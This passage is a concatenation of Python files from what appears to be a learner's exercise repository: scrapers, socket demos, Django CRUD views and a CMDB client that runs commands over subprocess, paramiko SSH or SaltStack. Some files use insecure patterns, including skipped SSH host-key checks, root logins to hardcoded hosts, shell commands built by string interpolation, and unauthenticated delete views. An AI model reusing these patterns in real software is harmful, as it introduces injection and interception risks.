cwd=web_file_path) return True def run(): project_name = sys.argv[1] version = sys.argv[2] file_name = sys.argv[3] # web_file_path = unpack_zipfile(project_name, version, file_name) kill_status = kill_origin_process('python3 manage.py runserver 0.0.0.0:8001') link_path = link(project_name, version, file_name) start_status = start_service(project_name, 'python3 manage.py runserver 0.0.0.0:8001') if __name__ == '__main__': run()<file_sep>/day9/my_socket_server.py import socketserver import time class Myserver(socketserver.BaseRequestHandler): def handle(self): #必须写这个名字 conn = self.request print(conn) time.sleep(3) conn.send(b'hello') time.sleep(5) conn.send(b'hello2') myserver=socketserver.ThreadingTCPServer(('127.0.0.1',9000),Myserver) myserver.serve_forever() # socketserver所启动的服务端是不能有input操作的 # server端一般都是根据client端的要求去执行固定的代码 <file_sep>/day25/爬取搜狗的关键字数据get请求.py import requests #######################爬取的结果是一个网页,基础版 ''' # 指定url url='https://www.sogou.com/web?query=%E9%AD%8F%E6%8C%AF%E6%B5%B7&' # 发起请求 response=requests.get(url=url) # 获取响应对象中的数据值 page_text=response.text # 存储到硬盘 with open('./weizhenhai.html','w',encoding='utf-8')as f: f.write(page_text) ''' ########################优化版,也是爬取一个网页 # 指定搜索关键字 word=input('please input a word you want search:') # 指定url url = 'https://www.sogou.com/web?' 
# 自定义请求头信息,防止目标网站设置防爬策略 headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } # 封装get请求参数 prams = { 'query': word, } # 发起请求 response = requests.get(url=url,params=prams) # 获取响应数据 page_text=response.text # 持久化存储 with open('./baidu.html','w',encoding='utf-8') as f: f.write(page_text) <file_sep>/day15/作业/core/main.py from core import register from core import login # 选择功能函数 def choice(): print("""请选择功能:1注册,2登录""") while True: num = input("请选择你要的功能序号:").strip() if num == "1": register.register() break elif num == "2": login.login() break else: print('你输入的不符合要求') continue choice() <file_sep>/day25/ower/aa.py import requests from lxml import etree import os url = 'https://www.btzhizhu.org/search-%E4%BD%90%E4%BD%90%E6%9C%A8%E5%B8%8C-video-create_time-1.html' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } # 创建文件夹 if not os.path.exists('vadeio'): os.mkdir('vadeio') response = requests.get(url=url, headers=headers) page_html=response.text # print(data) # 实例化一个etree对象,并且将页面数据放到etree tree = etree.HTML(page_html) url_list = tree.xpath('.//div[@class="table"]//div[@class=" xh-highlight"]') print(url_list) # for url in url_list: # # print(url) # all_url = url.xpath('/html/body/div[1]/table/tbody//tr//a')[0] # print(all_url) # print(all_url) # print(all_url) # for url in all_url: # print(url) <file_sep>/day6/3.初识面向对象.py # 函数 基础数据类型 循环 文件处理 模块 # 游戏公司 # 人狗大战 # 两个角色 # 人 # 昵称 # 性别 # 生命值 # 战斗力 # 背包 # 狗 # 昵称 # 品种 # 生命值 # 战斗力 def Person(name,sex,hp,dps): # 人模子 dic = {'name':name,'sex':sex,'hp':hp,'dps':dps,'bag':[]} def attack(dog): dog['hp'] -= dic['dps'] print('%s打了%s,%s掉了%s点血,剩余%s点血' % (dic['name'], dog['name'], dog['name'], dic['dps'], dog['hp'])) dic['attack'] = attack return dic def Dog(name,kind,hp,dps): # 狗模子 dic = {'name':name,'kind':kind,'hp':hp,'dps':dps} def bite(person): 
person['hp'] -= dic['dps'] print('%s咬了%s,%s掉了%s点血,剩余%s点血' % (dic['name'], person['name'], person['name'], dic['dps'], person['hp'])) dic['bite'] = bite return dic alex = Person('alex','不详',250,5) ha2 = Dog('哈士奇','藏獒',15000,200) # 人打狗 print(alex) print(ha2) print(alex['attack']) alex['attack'](ha2) print(ha2) # 面向对象的编程思想 # 人狗大战 # 创建一个人 # 创建一个狗 # 人打狗 —— 函数 # 狗咬人 —— 函数 # 造模子 —— 面向对象 # 规范了一类角色的属性项目、属性的名字、技能、技能的名字 # 权限 有一些函数 只能是这个角色才能拥有 才能调用<file_sep>/复习/文件操作.py #r+读写 # with open('log1',encoding='utf-8',mode='r+')as f1: # f1.seek(0,2)###把光标调整到最后,然后再去写,原来的内容不会被覆盖 # # print(f1.read()) # f1.write('555') # f1.seek(0)##然后把光标调整到最前面,再去读 # print(f1.read()) #w写 # with open('log1',encoding='utf-8',mode='w+') as f1: # f1.write('哈哈哈') # f1.seek(0) # print(f1.read()) #a追加和a+可写,可读 # with open('log1',encoding='utf-8',mode='a') as f1: # f1.write('\n很好') # f1.seek(0) # # print(f1.read()) # # with open('log1',encoding='utf-8',mode='a+') as f1: # f1.write('\n很好莫今天是') # f1.seek(0) # print(f1.read()) #文件的改 # import os # with open('log1',encoding='utf-8') as f1,\ # open('log1.bak',encoding='utf-8',mode='w+') as f2: #f1打开源文件,f2创建新文件 # for line in f1: # new_line=line.replace('hahaha','dfdf')#要改变的内容 # f2.write(new_line)#写入到新文件 # f2.seek(0) # print(f2.read()) # os.remove('log1') # os.rename('log1.bak','log1') #tell指针 # with open('log2',encoding='utf-8',mode='a+')as f1: # f1.write('dfdfdfdfdfdf') # print(f1.tell()) #编码转换 # s1 = b'\xd6\xd0\xb9\xfa' # s2 = s1.decode('gbk') # print(s2) # s3 = s2.encode('utf-8') # print(s3) #练习 # 通过代码,将其构建成这种数据类型:[{'name':'apple','price':10,'amount':3}, # {'name':'tesla','price':1000000,'amount':1}......] 
并计算出总价钱 new_list=[] total = 0 with open('log1',encoding='utf-8',mode='r') as f1: for i in f1: a=(i.split()) new_list.append({'name':a[0],'price':a[1],'amount':a[2]}) print(new_list) for g in new_list: money = g['price'] count = g['amount'] total = total + int(money) * int(count) print(total)<file_sep>/auto_client/src/client.py from src.plugins import PluginManager from conf import settings import requests from concurrent.futures import ThreadPoolExecutor # 导入线程模块 import json class BaseClient(object): # 公共类,都向服务端发送数据 def __init__(self): self.api = settings.API def post_server_info(self, server_dict): ''' 向服务端发送收集好的信息 :param server_dict: 这是从客户端上面收集到的信息 :return: ''' # requests.post(self.api, data=server_dict) # 通过from表单提交的k=v&k=a用这种方式发送,服务端只能收到key,不能获取value response = requests.post(self.api, json=server_dict) # 1 字典序列化,2 带请求头 content-type;application/json print(response) def exec(self): raise NotImplementedError("必须实现exec方法") class AgentClient(BaseClient): # agent方式 def exec(self): obj = PluginManager() server_dict = obj.exec_plugin() print('采集到服务器信息', server_dict) self.post_server_info(server_dict) # 调用post_server_info向服务端发送数据 class SaltSshClient(BaseClient): # Salt和ssh模式写到一起 def get_host_list(self): response=requests.get(self.api) print(response.text) return json.load(response.text) # 返回一个主机列表 def task(self, host): obj = PluginManager(host) # 实例化一个对象 server_dict = obj.exec_plugin() print(server_dict) self.post_server_info(server_dict) def exec(self): pool = ThreadPoolExecutor(10) # 开启10个线程,每次处理10个 host_list = self.get_host_list() for host in host_list: pool.submit(self.task, host['hostname']) # 异步提交任务和参数 <file_sep>/auto_client/src/plugins/__init__.py from lib.config import settings # 全局的配置文件 import importlib from conf import settings # 用户配置的配置文件 import requests import traceback # 获取详细的报错信息 # def func(): # ''' # 函数版 # :return: # ''' # server_info = {} # # 高度可扩展,可插拔式插件,参考Django源码中的中间件。 # for k, v in settings.PLUGIN_ITEMS.items(): # # 
找到v字符串:src.plugins.nic.Nic,src.plugins.disk.Disk # module_path, cls_name = v.rsplit('.', maxsplit=1) # 以点为分隔符,从右边第一个点开始 # module = importlib.import_module(module_path) # 模块名字<module 'src.plugins.disk' # print(module) # cls = getattr(module, cls_name) # 类名src.plugins.disk.Disk' # print(cls) # obj = cls() # ret = obj.process() # 接收函数返回来的值 # server_info[k] = ret # 把k和接收的值存放到字典里面,k是键值 # 类封装版 class PluginManager(): def __init__(self, hostname=None): self.hostname = hostname self.plugin_items = settings.PLUGIN_ITEMS # 插件列表 self.mode = settings.MODE # 收集模式 self.test = settings.TEST if self.mode == "SSH": self.ssh_user = settings.USERNAME self.ssh_port = settings.PORT self.ssh_pwd = <PASSWORD> def exec_plugin(self): ''' 收集插件信息的比如,内存,硬盘,运行每个插件里面的命令 :return: ''' server_info = {} # 高度可扩展,可插拔式插件,参考Django源码中的中间件。 for k, v in settings.PLUGIN_ITEMS.items(): # 去settings配置文件里面循环 info = {'status': True, 'data': None, 'msg': None} # 分别是状态,数据,报错信息 try: # 找到v字符串:src.plugins.nic.Nic,src.plugins.disk.Disk module_path, cls_name = v.rsplit('.', maxsplit=1) # 以点为分隔符,从右边第一个点开始 module = importlib.import_module(module_path) # 模块名字<module 'src.plugins.disk' # print(module) cls = getattr(module, cls_name) # 类名src.plugins.disk.Disk' # print(cls) if hasattr(cls, 'initial'): obj = cls.initial() # 用的静态方法 else: obj = cls() # 实例化一个对象 obj就是每个插件里面的类名,如Disk ret = obj.process(self.exec_cmd, self.test) # 去执行类里面的process方法并接收函数返回来的值 #ret结构:{'eth0': {'up': True, 'hwaddr': '00:1c:42:a5:57:7a', 'ipaddrs': '10.211.55.4', 'netmask': '255.255.255.0'}} info['data'] = ret except Exception as e: info['status'] = False info['msg'] = traceback.format_exc() server_info[k] = info # 把k和接收的值存放到字典里面,k是键值比如nic,memory return server_info def exec_cmd(self, cmd): ''' 判断使用哪种模式 :param cmd:用户传入的命令 :return: ''' if self.mode == "AGENT": import subprocess result = subprocess.getoutput(cmd) elif self.mode == "SSH": import paramiko ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 
ssh.connect(hostname=self.hostname, port=self.ssh_port, username=self.ssh_user, password=self.ssh_pwd) stdin, stdout, stderr = ssh.exec_command(cmd) result = stdout.read() ssh.close() elif self.mode == "SALT": import subprocess result = subprocess.getoutput('salt "%s" cmd.run "%s"' % (self.hostname, cmd)) else: raise Exception("模式选择错误:AGENT,SSH,SALT") return result <file_sep>/day27/s21crm/crm/views/userinfo.py from django.shortcuts import render, redirect from crm import models from crm.forms.user import UserInfoModelForm from django.urls import reverse def user_list(request): """ 部门列表 :param request: :return: """ queryset = models.UserInfo.objects.all() return render(request, 'user_list.html', {'queryset': queryset}) def user_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = UserInfoModelForm() return render(request, 'user_add.html', {'form': form}) form = UserInfoModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('user_list') else: return render(request, 'user_add.html', {'form': form}) def user_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.UserInfo.objects.filter(id=nid).first() if request.method == "GET": form = UserInfoModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'user_edit.html', {"form": form}) form = UserInfoModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('user_list') else: return render(request, 'user_edit.html', {"form": form}) def user_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.UserInfo.objects.filter(id=nid).delete() return redirect('user_list') <file_sep>/deploy/script/私钥连接.py import paramiko private_key = paramiko.RSAKey.from_private_key_file(r'C:\Users\Administrator\Desktop\deploy\script\id_rsa') # 前提要把公钥推送到服务器 # 创建SSH对象 ssh = paramiko.SSHClient() # 允许连接不在know_hosts文件中的主机 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 
连接服务器 ssh.connect(hostname='192.168.7.32', port=22, username='yx', pkey=private_key) # 执行命令 stdin, stdout, stderr = ssh.exec_command('df') # 获取命令结果 result = stdout.read() # 关闭连接 ssh.close() print(result.decode()) <file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/engine/salt.py #!/usr/bin/python # -*- coding:utf-8 -*- from .base import SaltAndSSHHandler class SaltHandler(SaltAndSSHHandler): def cmd(self, command, hostname=None): """ 调用saltstack远程连接主机并执行命令(saltstack的master) :param hostname:主机名 :param command: 要执行的命令 :return: """ import salt.client local = salt.client.LocalClient() result = local.cmd(hostname, 'cmd.run', [command]) return result[hostname] <file_sep>/day22/teplate_about/app01/templatetags/ooxx.py import datetime from django import template register = template.Library() # 把我写的函数注册成一个自定义的filter函数,就能在模板语言里使用了 @register.filter() def alex(arg, delta="7"): try: delta = int(delta) except Exception: delta = 7 # 在原来时间基础上加7天 ret = arg + datetime.timedelta(days=delta) # 把时间对象格式化成字符串格式 return ret.strftime("%Y-%m-%d %H:%M:%S") # 把一个函数注册成自定义的simple_tag @register.simple_tag() def gold(arg1, arg2, arg3): return "{}-{}-{}".format(arg1, arg2, arg3) # 用一些数据去填充一段HTML代码 把HTML代码返回给调用方 # 类似于一个简化版的render(request, "xx.html", {})函数 @register.inclusion_tag(filename="ul.html") def show_menu(arg): #必须传一个参数 ret = [i for i in range(arg)] #返回一个可迭代的对象 return {"num": ret}<file_sep>/day8/解决粘包/client.py import socket import struct sk=socket.socket() sk.connect(('127.0.0.1',8090)) num=sk.recv(4) #先接受bytes的长度 num=struct.unpack('i',num)[0]#提取报文的长度 print(sk.recv(num).decode('utf-8')) print(sk.recv(10)) sk.close()<file_sep>/复习/装饰器.py # # ##最简单的装饰器 # import time # # def func1(): # print('hello world') # time.sleep(0.3) # # def timer(f1): #因为下面timer(func1) 所以,#f1 = func1 # def inner(): # start_time = time.time() # f1() ##相当于执行func1() # end_time = time.time() # print('此函数的执行效率%s' %(end_time - start_time)) # return inner ##inner返回给了func1 # func1 = timer(func1) #等于inner # func1() ##执行inner() #第二种装饰器 
import time # def timer(f1): # def inner(): # start_time = time.time() # f1() # end_time = time.time() # print('此函数的执行效率是%s' % (end_time-start_time)) # return inner # # @timer ##func1 = timer(func1) =inner # def func1(): # print('hello world') # time.sleep(0.3) # func1() ##相当于执行了inner() ,然后返回到上面 执行inner里面的语句, # @timer #func1 = timer(func1) =inner # def func2(): # print('你好,世界') # time.sleep(0.4) # func2() #被装饰的函数带参数 # def timer(f1): ##f1 = func1 # def inner (*args,**kwargs): # start_time = time.time() # f1(*args,**kwargs) ##func1函数是在这步开始执行的func1(111,222) # end_time = time.time() # print('此函数的执行效率是%s' %(end_time-start_time)) # return inner # @timer #func1 = timer(func1) ##inner=func1 # def func1(a,b): # print(a,b) # print('hello world') # time.sleep(0.9) # func1(111,222) ##inner 把 111和222传给了上面的inner(*args) #被装饰的函数带返回值 def timer(f1): def inner(*args,**kwargs): start_time = time.time() ret = f1(*args,**kwargs) ##执行func1(111,222) end_time = time.time() print('此函数执行效率%s' % (end_time-start_time)) return ret ##返回给了func1 return inner @timer #func1 = timer(func1) #func1接收了inner就是func1=inner def func1(a,b): print(a,b) print('hello world') time.sleep(0.4) return 666 ret2 = func1(111,222) ##inner(111,222) print(ret2)<file_sep>/day2/test.py goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] new = dict() jiage_list = [] b = 0 for v in goods: #去循环goods列表然后给加入id v['id'] = b b += 1 #print (goods) salry = input ("请输入你的金额:") while True: for i in goods: print ( str(i.get("id"))+"\t"+i.get("name") + "\t" + str(i.get("price"))) #print ("%d%s%d % (goods.index(i),i["name"],i["price"])) m = input ("请输入你要购买的商品序号:").strip() if not m.isdigit() or m == '': print ("您输入的不是数字,请重新输入:") continue num = input("请输入你想要购买的个数:").strip() if not num.isdigit(): print ("请输入数字:") continue new.update({m: {"name": goods[int(m)].get("name"), "price": goods[int(m)].get("price"), "num": int(num)}}) print(new) buyTotal = 
goods[int(m)].get("price") * int(num) print(buyTotal) if int(buyTotal) > int(salry): print("你的余额不够,请充值") continue choiceYN = input("你还需要购买其它商品吗,Y/N: ") if choiceYN == "Y" or choiceYN == "Y".lower(): continue else: break total = 0 print("你购买的商品为:") for k,v in new.items(): print(v.get("name"),v.get("price") * v.get("num")) <file_sep>/day17/lianxi/templates/add_book.html {% extends "mother.html" %} {% block page-main%} <form action="" method="post"> {% csrf_token %} <input type="text" name="title"> <select name="publisher" id=""> {% for publisher in publisher_list %} <option value="{{ publisher.id }}">{{ publisher.name }}</option> {% endfor %} </select> <input type="submit" value="提交"> </form> {% endblock %} <file_sep>/day8/glance/api/policy.py def get(): print('from policy.py')<file_sep>/auto_client/lib/config/__init__.py import os import importlib from . import global_settings class Settings(object): # 这个类是用来获取两个配置文件里面的信息的 # global_settings, 全局配置获取 # settings.py,默认配置获取 def __init__(self): # 这个是获取全局变量里面的值 for item in dir(global_settings): # dir可以查看global_settings里面所有的变量 if item.isupper(): # 如果是大写,才往下执行,item就是k, k = item v = getattr(global_settings, item) # 根据字符串去里面找value setattr(self, k, v) # self是个对象,就相当于self.test=true # 默认 setting_path = os.environ.get('AUTO_CLIENT_SETTINGS') md_settings = importlib.import_module(setting_path) for item in dir(md_settings): if item.isupper(): k = item v = getattr(md_settings, item) # if k == "PLUGIN_ITEMS": # self.PLUGIN_ITEMS.update(v) # else: setattr(self, k, v) settings = Settings() <file_sep>/day7/student_guanlisystem/core/core.py import sys import hashlib from conf import settings from core.manager import Manager from core.student import Student from core.teacher import Teacher def login(): #登录认证,用了动态加盐 user=input('请输入用户名>>>:') pwd=input('请输入密码>>>:') hash_obj=hashlib.md5(user.encode('utf-8')) hash_obj.update(pwd.encode('utf-8')) md5_pwd=hash_obj.hexdigest() with open('../db/userinfo') as f: for line in f: 
username,passwd,identity=line.strip().split('|') if username==user and passwd ==<PASSWORD>: print('\033[1;32m登录成功!\033[0m') return {'username':user,'identity':identity} #{'username': 'admin', 'identity': 'Manager'} def main(): ret = login() if ret: #如果ret不为空 if hasattr(sys.modules[__name__],ret['identity']): Role_cls=getattr(sys.modules[__name__],ret['identity']) #print(Role_cls) #<class 'core.manager.Manager'> role_obj=Role_cls(ret['username']) # print(role_obj) while True: #一直循环让用户输入 if role_obj==Manager: for num,tup in enumerate(role_obj.Operate_lst,1): print(num,tup[0]) num=input('请输入你要操作的序号:') func_name = role_obj.Operate_lst[int(num)-1][1] #序号对应的内容 if hasattr(role_obj,func_name): getattr(role_obj,func_name)() # elif role_obj==Student: # student.student() <file_sep>/auto_client/bin/test.py # 1. agent形式在每个客户端上面运行 # import subprocess # result = subprocess.getoutput("dir") # print(result) # 2. SSH模式必须用paramiko模块 ,在一个中控机上面运行,相当于跳板机 import paramiko #用户名密码方式 ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname='172.16.58.3', port=8888, username='root', password='<PASSWORD>') stdin, stdout, stderr = ssh.exec_command('ifconfig') result = stdout.read() ssh.close() print(result) # 公钥私钥方式 # import paramiko # private_key = paramiko.RSAKey.from_private_key_file('/home/auto/.ssh/id_rsa') # ssh = paramiko.SSHClient() # ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # ssh.connect(hostname='c1.salt.com', port=22, username='wupeiqi', pkey=private_key) # stdin, stdout, stderr = ssh.exec_command('df') # result = stdout.read() # ssh.close() # 3. 
SaltStack模式 在saltstack主上面运行 # import subprocess # subprocess.getoutput('salt "c1.com" cmd.run "命令"')<file_sep>/day5/作业.py import re res = re.compile('\([^()]+\)') ##匹配最小单位的括号 def check_rede_and_except(s): ##检测表达式里面是否有乘除法 s1=s.replace(' ','') l = re.findall('([\d\.]+|/|-|\+|\*)',s1) ##['100.5', '+', '40', '*', '5', '/', '2', '-', '3', '*', '2', '*', '2', '/', '4', '+', '9'] while 1: if '*' in l and '/' not in l: ret = jisuan_rede_and_except(l,'*') elif '/' in l and '*' not in l: ret = jisuan_rede_and_except(l,'/') elif '/' in l and '*' in l: a=l.index('*') b=l.index('/') if a<b: ret = jisuan_rede_and_except(l,'*') else: ret = jisuan_rede_and_except(l,'/') else: break return jisuan_jia_and_jian(ret) def jisuan_rede_and_except(l,x): ##计算乘除 #print("l:%s %s:x" % (l,x)) # print(l) a = l.index(x) if x=='*' and l[a+1] !='-': k=float(l[a-1]) * float(l[a+1]) elif x=='/' and l[a+1] !='-': k=float(l[a-1]) / float(l[a+1]) elif x=='*' and l[a+1] =='-': k=-(float(l[a-1]) * float(l[a+2])) elif x=='/' and l[a+1] =='-': k=-(float(l([a-1])) / float(l[a+2])) del l[a-1],l[a-1], l[a-1] l.insert(a-1,str(k)) return l ##['100.5', '+', '100.0', '-', '3.0', '+', '9'] def jisuan_jia_and_jian(l): ##计算加减 sum = 0 while l: ##l=['100.5', '+', '100.0', '-', '3.0', '+', '9'] i=1,3,5 if l[0] == '-': ##['-','1','+','2'] l[0] = l[0] + l[1] ##l[0]=-1 del l[1] ##把1删除 sum += float(l[0]) for i in range(1, len(l), 2): ##取出l列表里面的加减符号 if l[i] == '+' and l[i + 1] != '-': sum += float(l[i + 1]) elif l[i] == '+' and l[i + 1] == '-': sum -= float(l[i + 2]) elif l[i] == '-' and l[i + 1] == '-': sum += float(l[i + 2]) elif l[i] == '-' and l[i + 1] != '-': sum -= float(l[i + 1]) break return sum # print('我是sum:%s'%(sum)) def calculate(expression): if not re.search(r'\([^()]+\)', expression): # 匹配最里面的括号,如果没有的话,直接进行运算,得出结果 return check_rede_and_except(expression) k = re.search(r'\([^()]+\)', expression).group() ##取出最小括号里面的值 # print(k) expression = expression.replace(k, str(check_rede_and_except(k[1:len(k) - 1]))) 
#print(expression) return calculate(expression) print('我是eval:%s'%(eval('1 - 2 * ( (60-30 +(-40/5+3) * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) )'))) s= '1 - 2 * ( (60-30 +(-40/5+3) * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) )' # s2='9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14' #print(eval('9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14')) print(calculate(s)) # check_rede_and_except(s2)<file_sep>/day25/bs4 爬取三国.py #!/usr/bin/env python # -*- coding:utf-8 -*- import requests from bs4 import BeautifulSoup headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } def parse_content(url): # 获取标题正文页数据 page_text = requests.get(url, headers=headers).text soup = BeautifulSoup(page_text, 'lxml') # 解析获得标签 ele = soup.find('div', class_='chapter_content') content = ele.text # 获取标签中的数据值 return content if __name__ == "__main__": url = 'http://www.shicimingju.com/book/sanguoyanyi.html' reponse = requests.get(url=url, headers=headers) page_text = reponse.text # 创建soup对象 soup = BeautifulSoup(page_text, 'lxml') # 解析数据 a_eles = soup.select('.book-mulu > ul > li > a') print(a_eles) cap = 1 for ele in a_eles: print('开始下载第%d章节' % cap) cap += 1 title = ele.string content_url = 'http://www.shicimingju.com' + ele['href'] content = parse_content(content_url) with open('./sanguo.txt', 'a',encoding='utf-8') as fp: fp.write(title + ":" + content + '\n\n\n\n\n') print('结束下载第%d章节' % cap) <file_sep>/复习/进程.py from multiprocessing import Process import time # # # def task(name): # print('%s piaoing' % name) # time.sleep(2) # print("%s is down" % name) # # # if __name__ == '__main__': # windows上面开启进程必须写这个 # # target目标,args传参 # p = Process(target=task, args=('alex',)) # 开启一个进程 # p1 = Process(target=task, args=('egon',)) # p.start() # 给操作系统发送一个指令 # p1.start() # print("主") # # from threading import Thread # import time # def sayhi(name): # time.sleep(2) # print('%s say hello' %name) # 
# if __name__ == '__main__': # t=Thread(target=sayhi,args=('egon',)) # t.start() # print('主线程') from threading import Thread from multiprocessing import Process import os def work(): print('hello') if __name__ == '__main__': #在主进程下开启线程 t=Thread(target=work) t.start() print('主线程/') ''' 打印结果: hello 主线程/主进程 ''' #在主进程下开启子进程 t=Process(target=work) t.start() print('/主进程') ''' 打印结果: 主线程/主进程 hello ''' <file_sep>/day2/01 str.py #切片 # * capitalize 首字母大写,其他字母小写 #* 大小写反转 swapcase() # *** 全部大写upper() 全部小写lower() #*非字母的元素隔开的每个单词首字母大写 title() #center 居中,长度自己设定,默认填充物None # *** startswith endswith # *** strip 去除首尾的空格,制表符\t,换行符。不仅仅是去除空格....也可以去除任意字符 #*** split (str ---> list) 不太懂 #join 将list --->str # #replace 替换 #find 通过元素找索引 找不到返回-1 # index 通过元素找索引 找不到报错 #格式化输出format #公共方法:len count <file_sep>/deploy/web/forms/depart.py # ModelForm有两大功能 # 1. 生成HTMl标签 # 2. 表单校验 from django.forms import ModelForm from web.forms.base import BootStrapModelForm from web import models class DepartModelForm(BootStrapModelForm): class Meta: model = models.Department fields = "__all__"<file_sep>/day16/s21/app01/views.py from django.shortcuts import render, HttpResponse, redirect from app01 import models from app01 import my_md5 # 登录页面 # def login(request): if request.method == "POST": user = request.POST.get("username") # 这里的username必须和html里面的name的值一致 pwd = request.POST.get("password") if user == "" or pwd == "": data = '用户名或密码不能为空' return render(request, "login.html", {"data": data}) else: try: obj = models.User.objects.get(username=user) except Exception: data = "此用户不存在" return render(request, "login.html", {"data": data}) if obj.username == user and obj.password == <PASSWORD>(user, pwd): request.session.set_expiry(0) request.session['user'] = obj.username return redirect("/show_user/") else: data = '用户名和密码错误' return render(request, "login.html", {"data": data}) else: return render(request, 'login.html') # 展示页面 def show_user(request): data = models.User.objects.all() v = request.session.get('user') # 
获取登录的用户名 if v: return render(request, "show_user.html", {"data": data, "v": v}) else: return redirect('/login/') # 注册页面 def register_user(request): if request.method == "POST": # 获取用户添加的用户名和密码 user = request.POST.get("username") pwd = request.POST.get("password") if user == "" or pwd == "": # return HttpResponse("用户名和密码不能为空") data = '用户名和密码不能为空' return render(request, "register_user.html", {"data": data}) else: # 写入到数据库 try: models.User.objects.create(username=user, password=<PASSWORD>(user, pwd)) except Exception: data = '用户名已经存在' return render(request, "register_user.html", {"data": data}) data = '注册成功,请登录' return render(request, "register_user.html", {"data": data}) else: return render(request, "register_user.html") # 删除用户 def del_user(request): # 获取用户要删除的id del_id = request.GET.get("id") # 去数据库里面删除 models.User.objects.get(id=del_id).delete() # 返回展示页面 return redirect("/show_user/") # 编辑用户 def edit_user(request): if request.method == "POST": edit_id = request.POST.get("id") new_user = request.POST.get("username") new_pwd = request.POST.get("password") obj = models.User.objects.get(id=edit_id) obj.username = new_user obj.password = <PASSWORD>) try: obj.save() except Exception: data = '用户名已经存在' return render(request, "edit_user.html", {"data": data}) return redirect("/show_user/") else: edit_id = request.GET.get("id") obj = models.User.objects.get(id=edit_id) v = request.session.get('user') if v: # 把要编辑的用户展示在这个页面上面 return render(request, "edit_user.html", {"user": obj, "v": v}) else: return redirect("/login/") def add_user(request): if request.method == "POST": # 获取用户添加的用户名和密码 user = request.POST.get("username") pwd = request.POST.get("password") if user == "" or pwd == "": data = '用户名和密码不能为空' return render(request, "add_user.html", {"data": data}) else: # 写入到数据库 try: models.User.objects.create(username=user, password=<PASSWORD>(user, pwd)) except Exception: data = '用户名已经存在' return render(request, "add_user.html", {"data": data}) return redirect("/show_user/") 
else: v = request.session.get('user') if v: return render(request, "add_user.html",{"v":v}) else: return redirect("/login/")<file_sep>/day4/装饰器进阶.py ##装饰器 ##同时管理多个被装饰的函数是否执行这个装饰器 # import time # flag = True # def manage(flag): # def timer(f1): # def inner(*args,**kwargs): # if flag == True: # start_time = time.time() # ret = f1(*args,**kwargs) ##func() # end_time = time.time() # print("这个函数花费了%s" %(end_time-start_time)) # return ret # else: # ret = f1(*args, **kwargs) # return ret # return inner # return timer # @manage(flag) ##func=timer(func) ##inner # def func(a,b): # print("heloo word") # print(a,b) # time.sleep(0.1) # return 222 # ret2 = func(222,333)##inner(222,333) # print(ret2) ''' ##两个装饰器装饰一个函数 def wrapper1(f1): ##第三部 func def inner1(*args,**kwargs): print("我是wrapper1,func before") ##第二部 ret = f1(*args,**kwargs) ##inner2 print("我是wrapper1,func after") return ret return inner1 ##第四步,返回给wraper1 def wrapper2(f1): ##第七步 f1 = inner1 def inner2(*args,**kwargs): ##第十一 print("我是wrapper2,func before") ret = f1(*args,**kwargs) ##inner1 print("我是wrapper,func after ") return ret return inner2 ##第八步 inner2返回给了wrapper2 @wrapper2 第五步 f=wrapper2(f) == f=wrapper2(inner1)##执行了inner1 f=inner2 @wrapper1 ##第二步 f = wrapper1(f) f = wrapper1(inner1) f=inner1 def func():## 第一步 print("我是func") func() ##第十部 即func() == inner2() ''' import time login_info = {'alex': False} def login(func): # manager def inner(name): if login_info[name] != True: user = input('user :') pwd = input('pwd :') if user == 'alex' and pwd == '<PASSWORD>': login_info[name] = True if login_info[name] == True: ret = func(name) # timmer中的inner return ret return inner def timmer(f): ##第三步 f= index def inner(*args, **kwargs): start_time = time.time() ret = f(*args, **kwargs) # 调用被装饰的方法 end_time = time.time() # print(end_time - start_time) return ret return inner ##第四部 @login ##第六部:index=login(index) == inner=login(inner) @timmer ##第二部 index = timmer(index) 第五步:index = inner def index(name): ##第一步 
print('欢迎%s来到博客园首页~' % name) @login @timmer # manager = login(manager) def manager(name): print('欢迎%s来到博客园管理页~' % name) index('alex') index('alex') manager('alex') manager('alex') <file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/plugins/__init__.py #!/usr/bin/python # -*- coding:utf-8 -*- from config import settings from lib.module_string import import_string def get_server_info(handler,hostname=None): """ 循环所有的插件,获取所有的资产信息,然后返回 :param handler: :return: """ info = {} for name,path in settings.PLUGIN_DICT.items(): cls = import_string(path) obj = cls() result = obj.process(handler,hostname) info[name] = result return info<file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/engine/base.py #!/usr/bin/python # -*- coding:utf-8 -*- import json import requests from config import settings from ..plugins import get_server_info class BaseHandler(object): def __init__(self): self.asset_api = settings.ASSET_API def cmd(self,command, hostname=None): raise NotImplementedError('cmd must be implemented') def handler(self): """ 约束所有的派生类都必须实现handler方法 :return: """ raise NotImplementedError('handler must be implemented') class SaltAndSSHHandler(BaseHandler): def handler(self): """ 处理SSH模式下的资产采集 :return: """ from concurrent.futures import ThreadPoolExecutor # 1. 获取未采集的主机的列表 r1 = 